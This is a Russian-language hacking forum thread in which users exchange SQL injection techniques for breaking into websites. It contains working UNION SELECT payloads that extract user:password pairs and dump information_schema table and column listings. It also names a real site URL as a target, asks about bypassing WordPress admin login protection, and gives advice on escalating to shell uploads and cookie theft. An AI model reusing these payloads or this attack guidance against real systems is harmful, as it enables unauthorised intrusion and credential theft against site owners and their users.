Спасибо, нужно серьезно зарываться в эту тему, за денек такое не осилишь. Еще вопрос: при такой уязвимости: SELECT subject, message WHERE ID=1'+инъекция, создается таблица с двумя строками, первая строка - данные "subject, message", вторая - данные, полученные с помощью оператора UNION инъекции. Проблема в том, что выводится в браузере только первая строка. Можно ли как-то вывести данные со второй строки ? Может есть возможность как-то соединить две строки в одну в одном запросе ? При ID=-1 ничего не выводит
Пост не осилил. Исходя из того, что удалось понять, стоит смотреть в сторону мануалов и изучения синтаксиса запросов. К примеру, в MySQL строки можно объеденить используя CONCAT.
Может неправильно выразился, примерный код вместе с инъекцией: SELECT subject, message FROM messages WHERE id=1 UNION SELECT user, password FROM users WHERE id=1 формирует таблицу с двумя строками, в браузере выводится только первая, а мне нужна вторая (с паролем). О CONCAT думал, сейчас читаю о ней.....
SELECT subject, message FROM messages WHERE id=1 UNION SELECT concat(user,':',password),2 FROM users WHERE id=1
Нужная строки выбирается limit n-1,1. SELECT subject, message FROM messages WHERE id=1 UNION SELECT user, password FROM users WHERE id=1 limit 1,1
мб кто вкурсе, можно ли в wordpress авторизоваться в админку не через wp-login.php? на нее штака стоит. На /wp-admin/ пускает но редиректит, куки админа не перехватить, но админские аккаунты имеются, какие есть варианты?
Что можно сделать с этой скулей? http://www.civildignity.ru/site_dev.php/ru/organisation_catalog/gallery/1631/fond_-inok-_den_za_dnem' как вытянуть бд? И где там админка?
С чего вы взяли что это скуля? Warning: realpath(): open_basedir restriction in effect. File(/usr/share/php) is not within the allowed path(s): (/var/www/civil/data:.) in /var/www/civil/data/www/_symfony-1.4.19/lib/util/sfToolkit.class.php on line 592 В самой ошибке ответ на все.
Такое ощущение что вы где то услышали термины: скуля,админка,залится и используете их не понимая смысла. 1.определить если есть ошибка 2.определить вектор атаки 3. Эксплуатируй уязвимость 4.используйте полученную информацию для получения доступа В твоём случае к чему вопрос о заливке если даже намека на уязвимость нет,не считая раскрытие путей,найди инъекцию,посмотри на права юзера,если file_priv=on,тогда задавай вопрос о заливке,или же получи данные от панели управления и тогда задавай вопрос о заливке,или вылови куки админа,и тогда задавай вопрос о заливке. Можно продолжать долго...
Вопрос такой. Есть иньекция на сайте. Таблицы выдергиваются из базы "А". На сервере под одним пользователем крутиться 3 базы: А. Б.С. Как составить запрос, чтобы можно выдернуть таблицы, колонки из базы Б и С? Так берутся данные из базы А. sqlmap не советуйте, сервер настроен так, что надо ручками. Когда я написал этот пост я не остановился. Я стал искать дальше и выяснил, что это можно сделать следующим запросом: group_concat(table_name+SEPARATOR+0x0b) - выводит список таблиц FROM%20information_schema.tables%20WHERE%20table_schema=0x6372%20-- - откуда брать таблицы. ЗаHEXованная строчка - это название базы данных. ну и колонки это:
Code: http://site/shop.php?id=-260+union+select+1,2,3,4,5,(select(@n)from(select(@n:=0x20),(select(null)from(information_schema.columns)where(0x2b)in(@n:=concat(@n,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))and(table_schema!=0x696e666f726d6174696f6e5f736368656d61)))n),7,8,9,10,11,12,13,14-- - Для ознакомления прочтите